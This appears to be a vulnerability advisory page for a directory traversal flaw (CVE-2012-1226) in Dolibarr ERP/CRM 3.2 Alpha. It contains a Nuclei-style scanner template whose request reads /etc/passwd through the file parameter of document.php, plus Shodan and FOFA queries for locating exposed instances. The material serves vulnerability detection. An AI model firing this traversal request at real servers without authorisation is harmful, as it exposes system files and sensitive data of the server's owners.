CVE-2012-1226: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities

2025-08-01 Dolibarr ERP CRM 3.2 Alpha PoC Public

Description

Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.

PoC

id: CVE-2012-1226

info:
  name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
  author: daffainfo
  severity: high
  description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
  impact: |
    Successful exploitation of these vulnerabilities could allow an attacker to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/36873
    - https://nvd.nist.gov/vuln/detail/CVE-2012-1226
    - http://www.vulnerability-lab.com/get_content.php?id=428
    - http://www.exploit-db.com/exploits/18480
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/73136
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2012-1226
    cwe-id: CWE-22
    epss-score: 0.251
    epss-percentile: 0.97815
    cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dolibarr
    product: dolibarr_erp\/crm
    shodan-query: http.favicon.hash:440258421
    fofa-query: icon_hash=440258421
  tags: cve,cve2012,lfi,dolibarr,traversal,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210091c6eb3b8d97cb49a8442c17d0a5fa8566de5c0d831e2150cda9a48d1612a38a02202d779022c5a008cd2ef4c9bafc432287a74711bd3d763acd8b4d541acfc9ec79:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities